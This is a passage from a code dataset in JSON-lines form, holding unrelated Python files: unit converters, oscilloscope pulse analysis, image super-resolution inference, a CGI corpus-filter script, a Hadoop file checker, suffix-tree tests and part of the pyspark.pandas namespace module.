= height * 3.281\nheight_in_feet = round(height_in_feet, 2 )\nprint ('your height in feet is ' + str(height_in_feet) + ' feet ')\n\n\n# get the user weight\nweight = raw_input('please input your weight in kg: ')\nprint('your wight in kg is: ' + str(weight) + ' kg')\n\nweight_in_stone = int(weight) * 0.15747304441777 \nweight_in_stone = round(weight_in_stone, 2 )\nprint('your weight_in_stone is ' + str(weight_in_stone) + ' stone')\n","sub_path":"Archive/convert_weight.py","file_name":"convert_weight.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"646295761","text":"#! 
/usr/bin/python\n\n# This is a script to extract:\n# pulse_height\n# pulse_position\n# fwhm (FWHM)\n# baseline_mean\n# baseline_stddev\n# signal_to_noise (ratio)\n# from the csv waveform data of an Tektronix DPO 4104B Oscilloscope\n\n# import needed libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sys\n\n# print arguments of the script\nprint(\"This is: \" + sys.argv[0])\nprint(\"path to data folder: \" + sys.argv[1])\nprint(\"lower dataset number: \" + sys.argv[2])\nprint(\"upper dataset number: \" + sys.argv[3])\nprint(\"pulse type (high/low): \" + sys.argv[4])\nprint(\"HV [V]: \" + sys.argv[5])\n\n# open file to write results to\ntry:\n path = sys.argv[1] + \"event_features_\" + str(sys.argv[4]) + \"Pulse_HV\" + str(sys.argv[5]) + \".csv\"\n result_file = open(path, \"w+\") # write plus create new file if not existent yet\n\n ch_list = [\"time\",\"ch0\",\"ch1\",\"ch2\",\"ch3\"]\n header_string = \"\"\n units_string = \"\"\n for channel in range(1,5):\n result_string = \"pulse_height_\" + ch_list[channel] + \",pulse_position_\" + ch_list[channel] + \",FWHM_\" + ch_list[channel]\n result_string = result_string + \",baseline_mean_\" + ch_list[channel] + \",baseline_stddev_\" + ch_list[channel] + \",signal_to_noise_\" + ch_list[channel]\n header_string = header_string + \",\" + result_string\n\n units_string = \"V,index a.u.,index a.u.,V,V,none,\"\n units_string = 4 * units_string\n units_string = units_string[:-1] # get rid of the last comma\n header_string += \"\\n\"\n units_string += \"\\n\"\n # write header and units line to file\n result_file.write(header_string)\n result_file.write(units_string)\nexcept:\n print(\"ERROR\")\n print(\"file: \" + path)\n print(\"cannot be opened or is not writable\")\n sys.exit() # terminate the programm if result file cannot be opened\n\n# import specified datasets with pandas\ndataset = int(sys.argv[2])\nmaxdataset = int(sys.argv[3]) + 1\nwhile (dataset < maxdataset):\n path = sys.argv[1] + \"tek\" + str(dataset).zfill(4) + \"ALL.csv\"\n dataframe = pd.read_csv(path, skiprows = 17)\n dataframe.columns = ch_list\n time_arb = np.arange(0, len(dataframe[\"time\"]))\n print(\"--- imported: \" + path)\n\n result_string = \"\"\n for channel in range(1, 5):\n # calculate values of interest\n pulse_height = 1000 # sufficient high value that is certainly higher than any signal\n pulse_position = 0\n fwhm = 0\n baseline_mean = 0\n baseline_stddev = 0\n baseline_sample = 0\n signal_to_noise = 0\n for row in range(0,len(dataframe[\"time\"])):\n value = dataframe.iloc[row, channel]\n\n # pulse_height\n if (value < pulse_height): # smallest value, because pulses are inverted\n pulse_height = value\n pulse_position = row\n\n # baseline evaluation\n if (row < 4500 or row > 5700):\n baseline_mean += value\n baseline_stddev += value*value\n baseline_sample += 1\n\n baseline_mean = baseline_mean/baseline_sample\n baseline_stddev = np.sqrt(baseline_stddev/baseline_sample - baseline_mean*baseline_mean) # more like RMS\n pulse_height = abs(pulse_height - baseline_mean)\n signal_to_noise = pulse_height/baseline_stddev\n #print(pulse_position)\n\n # FWHM\n fwhm_crit = baseline_mean - 0.5*pulse_height\n # left intersection\n for shift in range(1, 300):\n row = pulse_position - shift\n #print(row)\n value = dataframe.iloc[row, channel]\n prev_value = dataframe.iloc[row + 1, channel]\n\n if (value > fwhm_crit):\n shift = shift - abs(value-fwhm_crit)/abs(value-prev_value) # linear interpolation\n fwhm += shift\n break\n\n # right 
intersection\n for shift in range(1, 300):\n row = pulse_position + shift\n value = dataframe.iloc[row, channel]\n prev_value = dataframe.iloc[row - 1, channel]\n\n if (value > fwhm_crit):\n #print(value)\n #print(prev_value)\n if (value != prev_value): # linear interpolation if value and prev_value are unequal\n shift = shift - abs(value-fwhm_crit)/abs(value-prev_value)\n fwhm += shift\n break\n else:\n fwhm += shift\n break\n\n # write results for current channel to string\n result_string = result_string + str(pulse_height) + \",\" + str(pulse_position) + \",\" + str(fwhm) + \",\"\n result_string = result_string + str(baseline_mean) + \",\" + str(baseline_stddev) + \",\" + str(signal_to_noise) + \",\"\n\n\n # write results for current dataset to file\n result_string = result_string[:-1]\n result_string += \"\\n\"\n result_file.write(result_string)\n\n # go to next dataset\n dataset += 1\n\n# close result_file\nresult_file.close()\n","sub_path":"Python_scripts/event_features.py","file_name":"event_features.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18865604","text":"# NguyenU\n\ndef find_max(nums):\n max = nums[0]\n for y in nums:\n if y > max:\n max = y\n print(max)\n\ndef main():\n find_max([3, 7, 11, 19, 21, 91, 1])\n\nif __name__ == '__main__':\n main()\n","sub_path":"Maths/FindMax.py","file_name":"FindMax.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"310723118","text":"import argparse\n#import time\nimport re\nimport os\nimport torch\nfrom torch.utils.data import DataLoader\nfrom PIL import Image\nfrom torch.autograd import Variable\nfrom torchvision.transforms import ToTensor, ToPILImage\nfrom torch.utils.data.dataset import Dataset\nfrom tqdm import tqdm\n\n\nfrom model import Generator\n\nclass loadfromfolder(Dataset):\n def __init__(self, folder):\n super(loadfromfolder, self).__init__()\n self.folder = folder\n self.files = sorted(os.listdir(self.folder), key=lambda item: int(re.findall(r'\\d+', item)[0]))\n self.filenames = [os.path.join(self.folder, x) for x in self.files]\n\n def __getitem__(self, index):\n return ToTensor()(Image.open(self.filenames[index]))\n\n def __len__(self):\n return len(self.filenames)\n\n def get_name(self, index):\n return self.files[index]\n\nparser = argparse.ArgumentParser(description='Test Multiple Images')\nparser.add_argument('--upscale_factor', default=4, type=int, help='super resolution upscale factor')\nparser.add_argument('--test_mode', default='GPU', type=str, choices=['GPU', 'CPU'], help='using GPU or CPU')\nparser.add_argument('--img_folder', type=str, help='folder with low resolution images')\nparser.add_argument('--save_to', default='./', type=str, help='folder to save generated images to')\nparser.add_argument('--model_name', default='netG_epoch_4_100.pth', type=str, help='generator model epoch name')\nparser.add_argument('--batch_size', default=32, type=int, help='batch size')\nopt = parser.parse_args()\n\nUPSCALE_FACTOR = opt.upscale_factor\nTEST_MODE = True if opt.test_mode == 'GPU' else False\nIMAGE_FOLDER = opt.img_folder\nSAVE_TO = opt.save_to\nMODEL_NAME = opt.model_name\nBATCH_SIZE = opt.batch_size\n\nimage_set = loadfromfolder(IMAGE_FOLDER)\nimage_loader = DataLoader(dataset=image_set, num_workers=0, batch_size=BATCH_SIZE, shuffle=False)\n\nmodel = Generator(UPSCALE_FACTOR).eval()\nif TEST_MODE:\n model.cuda()\n 
model.load_state_dict(torch.load(MODEL_NAME))\nelse:\n model.load_state_dict(torch.load(MODEL_NAME, map_location=lambda storage, loc: storage))\n\nimg_bar = tqdm(image_loader)\ncount = 0\nfor img in img_bar:\n img_c = Variable(img, volatile=True)\n # print \"SHAPE: \", img_c.shape\n if TEST_MODE:\n img_c = img_c.cuda()\n\n out = model(img_c)\n\n for im in out:\n# print \"SHAPE: \", im.shape, \"TYPE:\", type(im)\n out_im = ToPILImage()(im.data.cpu())\n out_im.save(SAVE_TO + 'processed_' + image_set.get_name(count))\n count += 1 \n\n \n\n# image = Image.open(IMAGE_NAME)\n# image = Variable(ToTensor()(image), volatile=True).unsqueeze(0)\n#if TEST_MODE:\n# image = image.cuda()\n\n#start = time.clock()\n#out = model(image)\n#elapsed = (time.clock() - start)\n#print('cost' + str(elapsed) + 's')\n#out_img = ToPILImage()(out[0].data.cpu())\n#out_img.save('out_srf_' + str(UPSCALE_FACTOR) + '_' + IMAGE_NAME)\n","sub_path":"test_image_batch.py","file_name":"test_image_batch.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"42831266","text":"#!../.interrogatorio/bin/python3\n# -*- coding: UTF-8 -*-\n\nprint(\"Content-type:text/html; charset=utf-8\")\nprint('\\n\\n')\n\nimport os\nimport cgi,cgitb\ncgitb.enable()\nimport re\nimport estrutura_dados\nimport estrutura_ud\nimport interrogar_UD\nfrom datetime import datetime\nimport functions\nfrom functions import tabela, prettyDate\nimport json\nfrom credenciar import LOGIN\nfrom functions import fromInterrogarToHtml, cleanEstruturaUD\nimport html as web\nimport sys\nimport dill as pickle\n\nfrom estrutura_dados import slugify as slugify\n\nform = cgi.FieldStorage()\n\nif not 'pesquisa' in form and not 'action' in form:\n\thtml = 'Filtrar: Interrogatório'\n\thtml += '
'\n\thtml += '
'\n\tprint(html)\n\nelif not 'action' in form: #or form['action'].value not in ['desfazer', 'view', 'remove']:\n\n\tif LOGIN:\n\t\tif (not 'HTTP_COOKIE' in os.environ) or ('HTTP_COOKIE' in os.environ and not 'conectado' in os.environ['HTTP_COOKIE']):\n\t\t\thtml = ''\n\t\t\tprint(html)\n\t\t\texit()\n\n\tpesquisa = form['pesquisa'].value.strip()\n\tif re.search(r'^\\d+$', pesquisa.split(' ')[0]):\n\t\tcriterio = pesquisa.split(' ')[0]\n\t\tparametros = pesquisa.split(' ', 1)[1]\n\telif len(pesquisa.split('\"')) > 2 or any(x in pesquisa for x in [\"==\", \" = \", \" != \"]):\n\t\tcriterio = '5'\n\t\tparametros = pesquisa\n\telse:\n\t\tcriterio = '1'\n\t\tparametros = pesquisa\n\t\n\twith open('./interrogar-ud/max_crit.txt', 'r') as f:\n\t\tmax_crit = f.read().split()[0]\n\tif int(criterio) > int(max_crit):\n\t\tprint('em desenvolvimento')\n\t\texit()\n\n\tdata = str(datetime.now()).replace(' ', '_').split('.')[0]\n\tud = form['udoriginal'].value\n\tpagina_html = form['html'].value\n\tpesquisa_original = form['pesquisa_original'].value\n\n\tif os.path.isfile('./cgi-bin/json/' + slugify(ud + \"_\" + pesquisa_original.split(\" \", 1)[1] + \".json\")):\n\t\twith open(\"./cgi-bin/json/\" + slugify(ud + \"_\" + pesquisa_original.split(\" \", 1)[1] + \".json\")) as f:\n\t\t\tbusca_original = json.load(f)\n\telse:\n\t\tbusca_original = interrogar_UD.main('./interrogar-ud/conllu/' + ud, int(pesquisa_original.split(\" \", 1)[0]), pesquisa_original.split(\" \", 1)[1], fastSearch=True)\n\tbusca_original = [cleanEstruturaUD(x['resultado'].split(\"# sent_id = \")[1].split(\"\\n\")[0]) for x in busca_original['output']]\n\t\n\tif not 'nome_pesquisa' in form:\n\t\tnome_filtro = form['pesquisa'].value.replace('', '').replace('', '').replace('', '').replace('', '').replace('', '').replace('', '').replace('', '').replace('', '').strip()\n\telse:\n\t\tnome_filtro = form['nome_pesquisa'].value.strip()\n\n\tresultados = interrogar_UD.main('./interrogar-ud/conllu/' + ud, int(criterio), parametros)\n\tif not os.path.isdir('./cgi-bin/json'):\n\t\tos.mkdir('./cgi-bin/json')\n\ttry:\n\t\twith open(\"./cgi-bin/json/\" + slugify(ud + \"_\" + parametros + \".p\"), \"wb\") as f:\n\t\t\tpickle.dump(resultados, f)\n\texcept Exception as e:\n\t\tsys.stderr.write(\"=> \" + str(e))\n\t\tpass\n\n\tif os.path.isfile(\"./cgi-bin/filtros.json\"):\n\t\twith open(\"./cgi-bin/filtros.json\", \"r\") as f:\n\t\t\tfiltros = json.load(f)\n\telse:\n\t\tfiltros = {}\n\t\t\n\tif not pagina_html in filtros:\n\t\tfiltros[pagina_html] = {'ud': ud, 'filtros': {}}\n\tif not nome_filtro in filtros[pagina_html]['filtros']:\n\t\tfiltros[pagina_html]['filtros'][nome_filtro] = {'parametros': [], 'sentences': []}\n\tfiltros[pagina_html]['filtros'][nome_filtro]['sentences'].extend([y for y in [x['resultadoEstruturado'].sent_id for x in resultados['output']] if y in busca_original and y not in [k for filtro in filtros[pagina_html]['filtros'] for k in filtros[pagina_html]['filtros'][filtro]['sentences']]])\n\tfiltros[pagina_html]['filtros'][nome_filtro]['parametros'].append(criterio + ' ' + parametros)\n\n\twith open(\"./cgi-bin/filtros.json\", \"w\") as f:\n\t\tjson.dump(filtros, f)\n\t\t\n\tprint('')\n\nelif form['action'].value == 'desfazer':\n\t\n\tif LOGIN:\n\t\tif (not 'HTTP_COOKIE' in os.environ) or ('HTTP_COOKIE' in os.environ and not 'conectado' in os.environ['HTTP_COOKIE']):\n\t\t\thtml = ''\n\t\t\tprint(html)\n\t\t\texit()\n\n\tnome_html = form['html'].value\n\tnome_filtro = form['filtro'].value\n\n\twith open(\"./cgi-bin/filtros.json\") as 
f:\n\t\tfiltros = json.load(f)\n\n\tfiltros[nome_html]['filtros'].pop(nome_filtro)\n\n\twith open(\"./cgi-bin/filtros.json\", \"w\") as f:\n\t\tjson.dump(filtros, f)\n\n\tprint(f\"Filtro desfeito, feche esta janela.\")#//window.location = '../interrogar-ud/resultados/{nome_html}.html'\n\nelif form['action'].value == 'view':\n\tnome_html = form['html'].value\n\tnome_filtro = form['filtro'].value\n\n\twith open(\"./cgi-bin/filtros.json\") as f:\n\t\tfiltros = json.load(f)\n\n\tnum_filtros = len(filtros[nome_html]['filtros'][nome_filtro]['sentences'])\n\tud = filtros[nome_html]['ud']\n\tparametros = \"\\n
\".join(filtros[nome_html]['filtros'][nome_filtro]['parametros'])\n\tsentences = filtros[nome_html]['filtros'][nome_filtro]['sentences']\n\n\thtml = ''\n\thtml += ''\n\thtml += \"{title}

{nome_filtro} ({len_filtros})\\\n\t\t[Lista de sent_id] \\\n\t\t[Desfazer filtro] \\\n\t\t\\\n\t\t{parametros}\\\n\t\tBusca inicial: {nome_html}\\\n\t\tCorpus: {ud}
\".format(\n\t\ttitle=nome_filtro + ' (' + str(num_filtros) + ') - Interrogatório',\n\t\tnome_filtro=web.escape(nome_filtro),\n\t\tnome_filtro_encoded = functions.encodeUrl(nome_filtro),\n\t\tlen_filtros=num_filtros,\n\t\tnome_html=nome_html,\n\t\tud=ud,\n\t\tparametros=parametros,\n\t)\n\n\tresultados = []\n\tsentences_ja_filtrados = []\n\tfor parametros in filtros[nome_html]['filtros'][nome_filtro]['parametros']:\n\t\tif os.path.isfile('./cgi-bin/json/' + slugify(ud + \"_\" + parametros.split(\" \", 1)[1] + \".p\")):\n\t\t\twith open(\"./cgi-bin/json/\" + slugify(ud + \"_\" + parametros.split(\" \", 1)[1] + \".p\"), \"rb\") as f:\n\t\t\t\tbusca = pickle.load(f)\n\t\telse:\n\t\t\tbusca = interrogar_UD.main(f\"./interrogar-ud/conllu/{ud}\", int(parametros.split(\" \", 1)[0]), parametros.split(\" \", 1)[1])\n\t\tfor x in busca['sentences']:\n\t\t\tif x in sentences and x not in sentences_ja_filtrados:\n\t\t\t\tresultados.append(busca['output'][busca['sentences'][x]]['resultadoAnotado'])\n\t\t\t\tsentences_ja_filtrados.append(x)\n\t\n\ttotal = len(resultados)\n\tfor i, resultado in enumerate(resultados):\n\t\thtml += '
[x] {agora} / {maximo} - {sentence}{text}{anno}
'.format(\n\t\t\tsentence=cleanEstruturaUD(fromInterrogarToHtml(resultado.sent_id)).strip(),\n\t\t\ttext=fromInterrogarToHtml(resultado.metadados['clean_text'] if 'clean_text' in resultado.metadados else resultado.text),\n\t\t\thtml=nome_html,\n\t\t\tfiltro=web.escape(nome_filtro.replace('\"', \""\")),\n\t\t\tagora=i+1,\n\t\t\tmaximo=total,\n\t\t\tanno=fromInterrogarToHtml(resultado.tokens_to_str()),\n\t\t\t)\n\t\thtml += \"
\"\n\n\thtml += \"

\"\n\tprint(html)\n\nelif form['action'].value == 'remove':\n\tif LOGIN:\n\t\tif (not 'HTTP_COOKIE' in os.environ) or ('HTTP_COOKIE' in os.environ and not 'conectado' in os.environ['HTTP_COOKIE']):\n\t\t\thtml = ''\n\t\t\tprint(html)\n\t\t\texit()\n\n\tnome_html = form['html'].value\n\tnome_filtro = form['filtro'].value\n\tforbidden_sent_id = form['s'].value\n\n\twith open(\"./cgi-bin/filtros.json\") as f:\n\t\tfiltros = json.load(f)\n\n\tfiltros[nome_html]['filtros'][nome_filtro]['sentences'] = [x for x in filtros[nome_html]['filtros'][nome_filtro]['sentences'] if x not in [forbidden_sent_id]]\n\n\twith open(\"./cgi-bin/filtros.json\", \"w\") as f:\n\t\tjson.dump(filtros, f)\n\n\tprint(\"\")\n","sub_path":"www/cgi-bin/filtrar.py","file_name":"filtrar.py","file_ext":"py","file_size_in_byte":10137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52418077","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup\n\nimport os\n\n\ntry:\n from pypandoc import convert\n\n def read_md(f):\n return convert(f, 'rst')\n\nexcept ImportError:\n convert = None\n print(\n \"warning: pypandoc module not found, could not convert Markdown to RST\"\n )\n\n def read_md(f):\n return open(f, 'r').read() # noqa\n\nREADME = os.path.join(os.path.dirname(__file__), 'README.md')\n\n\nsetup(\n name='mcok',\n version=\"0.0.2\",\n author='Michał Jaworski',\n author_email='swistakm@gmail.com',\n description=\"Mock mock's Mock\",\n long_description=read_md(README),\n url='https://github.com/pylola/mcok',\n include_package_data=True,\n install_requires=[],\n zip_safe=True,\n py_modules=['mock'],\n\n license=\"BSD\",\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"565739628","text":"#!/anaconda_env/personal/wangsheng/deeplearningD/bin/python\r\nimport sys\r\nimport os\r\nimport subprocess\r\nimport time\r\nfrom datetime import date, timedelta, datetime\r\nfrom pytz import utc, timezone\r\n\r\navro_record_folder = sys.argv[1]\r\navroHDFS = sys.argv[2]\r\n\r\ndef difference(dt):\r\n avro_record_directory = avro_record_folder\r\n date_6chars = dt.strftime('%y%m%d')\r\n os.chdir(avro_record_directory)\r\n try:\r\n text_file = open(os.path.join(avro_record_directory, date_6chars+'.txt'), 'r+')\r\n text_content = text_file.read()\r\n text_content = text_content.split('\\n')[:-1]\r\n except FileNotFoundError:\r\n text_file = open(os.path.join(avro_record_directory, date_6chars+'.txt'), 'w')\r\n text_content = []\r\n\r\n date_8chars = dt.strftime('%Y%m%d')\r\n hdfs_avros = os.path.join(avroHDFS, date_8chars)\r\n all_avro = subprocess.run(['hadoop', 'fs', '-ls', '-t', hdfs_avros], stdout=subprocess.PIPE\r\n ).stdout.decode('utf-8')\r\n all_avro_list = all_avro.splitlines()[1:]\r\n all_avro_list = [i.split(' ')[-1] for i in all_avro_list]\r\n\r\n difference = list(set(all_avro_list).difference(set(text_content)))\r\n if len(difference) == 0: # there is no change in the avro file \r\n latest_file = None\r\n else: \r\n text_file.write(difference[0] + '\\n')\r\n latest_file = difference[0]\r\n text_file.close()\r\n return latest_file\r\n\r\n\r\n\r\nif __name__ == '__main__': \r\n today = 
datetime.now(timezone('Asia/Singapore'))\r\n yesterday = today - timedelta(days=1)\r\n ystd_file = difference(yesterday)\r\n if not ystd_file:\r\n print(difference(today))\r\n else:\r\n print(ystd_file) ","sub_path":"src/pipeline/get_next_avro.py","file_name":"get_next_avro.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"278437174","text":"from suffix_trees_mc import STree\n\nfrom suffix_tree import Tree\nfrom suffix_tree.node import Internal, Leaf\nfrom suffix_tree import ukkonen\nfrom suffix_tree import ukkonen_gusfield\nfrom SimpleTries import SimpleTrie, SimpleNode\nfrom TreeUtils import merge_trie_vertical, convertSimpleTree\nfrom suffix_tree.util import Path, UniqueEndChar\n\nBUILDERS = [\n ['ukkonen', ukkonen.Builder],\n ['gusfield', ukkonen_gusfield.Builder]\n]\n\n\ndef print_tree(sTreeRoot):\n for links in sTreeRoot.transition_links:\n # for link in links:\n print(links[0])\n if len(links[0].transition_links) > 0:\n print_tree(links[0])\n\n\nchild_list = ['0', '1']\n\n#\n# def convertSimpleTreeFromDot(dot_file):\n# with open(dot_file, 'r') as file:\n# relation = dict()\n# nodes = []\n# for line in file:\n# if ['{', '}'] not in line:\n# if '->' in line:\n# parts = line.split('->')\n# relation[parts[0].strip()] = get_last_char(parts[1].split(' ')[0])\n#\n# else:\n# node_label = line.split(\" \")[0]\n# node_label = get_last_char(node_label)\n# node = SimpleNode(node_label, dict(), None)\n# nodes.append(node)\n\n#\n# def merge_tree_vertical(tree1, tree2, merged_tree):\n# tree1_child = None\n# tree2_child = None\n# # if not merged_tree.parent == None:\n# if not tree1.is_leaf():\n# tree1_child = tree1.children # key=0/1/$\n# else:\n# tree1_child = tree1.__str__().split('$')[0].strip()[-1:]\n# merged_tree.children[tree1_child] = SimpleNode(tree1.__str__().split('$')[1].strip(), merged_tree)\n# if not tree2.is_leaf():\n# tree2_child = tree2.children\n# else:\n# tree2_child = tree2.__str__().split('$')[0].strip()[-1:]\n# merged_tree.children[tree2_child] = SimpleNode(tree2.__str__().split('$')[1].strip(), merged_tree)\n#\n# # if ('0' in tree1_child and '0' in tree2_child):\n# for child in child_list:\n# copied = None\n# if child in tree1_child and child in tree2_child:\n# copied = SimpleNode(child, merged_tree)\n# merged_tree.children[child] = copied\n# # merge_tree_vertical(tree1_child[child], tree2_child[child], copied)\n# if (isinstance(tree1_child, dict) and isinstance(tree2_child, dict)):\n# merge_tree_vertical(tree1_child[child], tree2_child[child], copied)\n# else:\n# if isinstance(tree1_child, dict):\n# # copied = SimpleNode(child, dict(), merged_tree)\n# convertSimpleTree(tree1_child[child], copied)\n# else:\n# convertSimpleTree(tree2_child[child], copied)\n#\n# elif child not in tree1_child and child in tree2_child:\n# # copied = copy.deepcopy(tree2_child[child])\n# copied = SimpleNode(child, merged_tree)\n# if isinstance(tree2_child, dict):\n# convertSimpleTree(tree2_child[child], copied)\n# else:\n# convertSimpleTree(tree2_child, copied)\n# # merged_tree[child] = copied\n# elif child in tree1_child and child not in tree2_child:\n# copied = SimpleNode(child, merged_tree)\n# if isinstance(tree1_child, dict):\n# convertSimpleTree(tree1_child[child], copied)\n# else:\n# convertSimpleTree(tree1_child, copied)\n# # merged_tree[child] = copied\n# else:\n# return\n\n\n#\n# # Suffix-Tree example.\n# # st = STree.STree(\"abcdefghab\")\n# # print(st.find(\"abc\")) # 0\n# # 
print(st.find_all(\"ab\")) # [0, 8]\n#\n# # Generalized Suffix-Tree example.\n# # a = [\"nonsense\", \"sense\", \"offense\"]\n# a = \"nonsense\"\n# st = STree.STree(a)\n# # print(st.find(\"sen\"))\n# #\n# print_tree(st.root)\n# # print(st.lcs()) # \"abc\"\ntree1 = Tree({'S_0_3': '010'}, builder=ukkonen.Builder)\n# tree2 = Tree({'S21': '111', 'S31': '110'}, builder=ukkonen.Builder)\ntree2 = Tree({'S_4_3': '001'}, builder=ukkonen.Builder)\n\ntestTree10 = SimpleTrie(\"S_4_3\")\nconvertSimpleTree(tree2.root.children['0'], testTree10.root)\n\ntestTree00 = SimpleTrie(\"S_0_3\")\nconvertSimpleTree(tree1.root.children['0'], testTree00.root)\nrest_sequence = SimpleTrie(\"S_0_3\")\nrest_sequence.from_string('101')\ntestTree00.add_tree(rest_sequence)\n\n\ntestTree00_10 = SimpleTrie(\"S_0\")\n# merge_trie_horizontal(testTree00.root, testTree10.root, testTree00_10.root)\nmerge_trie_vertical(testTree00.root, testTree10.root, testTree00_10.root)\n\n# merged_tree = SimpleTree(\"R(0+1)1\")\n# merge_tree_vertical(tree1.root.children['0'], tree2.root.children['0'], merged_tree.root)\n#\n# dot = testTree00_10.to_GraphViz()\n# with open('suffix_tree.dot', 'w') as tmp:\n# tmp.write(dot)\n#\n# dot = testTree10.to_GraphViz()\n# with open('suffix_tree2.dot', 'w') as tmp:\n# tmp.write(dot)\ndot = testTree00.to_GraphViz()\nwith open('suffix_tree2.dot', 'w') as tmp:\n tmp.write(dot)\n\n# print(tree.find('sense'))\n# tree_file = SimpleTree(\"file\").from_GraphViz('suffix_tree1.dot')\n","sub_path":"TreeConstruction/SuffixTreeTest.py","file_name":"SuffixTreeTest.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"87126909","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. 
You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\"\"\"\nWrappers around spark that correspond to common pandas functions.\n\"\"\"\nfrom typing import (\n Any,\n Callable,\n Dict,\n List,\n Optional,\n Set,\n Sized,\n Tuple,\n Type,\n Union,\n cast,\n no_type_check,\n)\nfrom collections.abc import Iterable\nfrom datetime import tzinfo\nfrom functools import reduce\nfrom io import BytesIO\nimport json\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nfrom pandas.api.types import ( # type: ignore[attr-defined]\n is_datetime64_dtype,\n is_datetime64tz_dtype,\n is_list_like,\n)\nfrom pandas.tseries.offsets import DateOffset\nimport pyarrow as pa\nimport pyarrow.parquet as pq\nfrom pyspark.sql import functions as F, Column as PySparkColumn\nfrom pyspark.sql.functions import pandas_udf\nfrom pyspark.sql.types import (\n ByteType,\n ShortType,\n IntegerType,\n LongType,\n FloatType,\n DoubleType,\n BooleanType,\n TimestampType,\n TimestampNTZType,\n DecimalType,\n StringType,\n DateType,\n StructType,\n DataType,\n)\nfrom pyspark.sql.dataframe import DataFrame as PySparkDataFrame\n\nfrom pyspark import pandas as ps\nfrom pyspark.pandas._typing import Axis, Dtype, Label, Name\nfrom pyspark.pandas.base import IndexOpsMixin\nfrom pyspark.pandas.utils import (\n align_diff_frames,\n default_session,\n is_name_like_tuple,\n is_name_like_value,\n name_like_string,\n same_anchor,\n scol_for,\n validate_axis,\n log_advice,\n)\nfrom pyspark.pandas.frame import DataFrame, _reduce_spark_multi\nfrom pyspark.pandas.internal import (\n InternalFrame,\n DEFAULT_SERIES_NAME,\n HIDDEN_COLUMNS,\n SPARK_INDEX_NAME_FORMAT,\n)\nfrom pyspark.pandas.series import Series, first_series\nfrom pyspark.pandas.spark.utils import as_nullable_spark_type, force_decimal_precision_scale\nfrom pyspark.pandas.indexes import Index, DatetimeIndex, TimedeltaIndex\nfrom pyspark.pandas.indexes.multi import MultiIndex\n\n# For Supporting Spark Connect\nfrom pyspark.sql.utils import get_column_class\n\n__all__ = [\n \"from_pandas\",\n \"range\",\n \"read_csv\",\n \"read_delta\",\n \"read_table\",\n \"read_spark_io\",\n \"read_parquet\",\n \"read_clipboard\",\n \"read_excel\",\n \"read_html\",\n \"to_datetime\",\n \"date_range\",\n \"to_timedelta\",\n \"timedelta_range\",\n \"get_dummies\",\n \"concat\",\n \"melt\",\n \"isna\",\n \"isnull\",\n \"notna\",\n \"notnull\",\n \"read_sql_table\",\n \"read_sql_query\",\n \"read_sql\",\n \"read_json\",\n \"merge\",\n \"merge_asof\",\n \"to_numeric\",\n \"broadcast\",\n \"read_orc\",\n]\n\n\ndef from_pandas(pobj: Union[pd.DataFrame, pd.Series, pd.Index]) -> Union[Series, DataFrame, Index]:\n \"\"\"Create a pandas-on-Spark DataFrame, Series or Index from a pandas DataFrame, Series or Index.\n\n This is similar to Spark's `SparkSession.createDataFrame()` with pandas DataFrame,\n but this also works with pandas Series and picks the index.\n\n Parameters\n ----------\n pobj : pandas.DataFrame or pandas.Series\n pandas DataFrame or Series to read.\n\n Returns\n -------\n Series or DataFrame\n If a pandas Series is passed in, this function returns a pandas-on-Spark Series.\n If a pandas DataFrame is passed in, this function 
returns a pandas-on-Spark DataFrame.\n \"\"\"\n if isinstance(pobj, pd.Series):\n return Series(pobj)\n elif isinstance(pobj, pd.DataFrame):\n return DataFrame(pobj)\n elif isinstance(pobj, pd.Index):\n return DataFrame(pd.DataFrame(index=pobj)).index\n else:\n raise TypeError(\"Unknown data type: {}\".format(type(pobj).__name__))\n\n\n_range = range # built-in range\n\n\ndef range(\n start: int, end: Optional[int] = None, step: int = 1, num_partitions: Optional[int] = None\n) -> DataFrame:\n \"\"\"\n Create a DataFrame with some range of numbers.\n\n The resulting DataFrame has a single int64 column named `id`, containing elements in a range\n from ``start`` to ``end`` (exclusive) with step value ``step``. If only the first parameter\n (i.e. start) is specified, we treat it as the end value with the start value being 0.\n\n This is like the range function in SparkSession and is used primarily for testing.\n\n Parameters\n ----------\n start : int\n the start value (inclusive)\n end : int, optional\n the end value (exclusive)\n step : int, optional, default 1\n the incremental step\n num_partitions : int, optional\n the number of partitions of the DataFrame\n\n Returns\n -------\n DataFrame\n\n Examples\n --------\n When the first parameter is specified, we generate a range of values up till that number.\n\n >>> ps.range(5)\n id\n 0 0\n 1 1\n 2 2\n 3 3\n 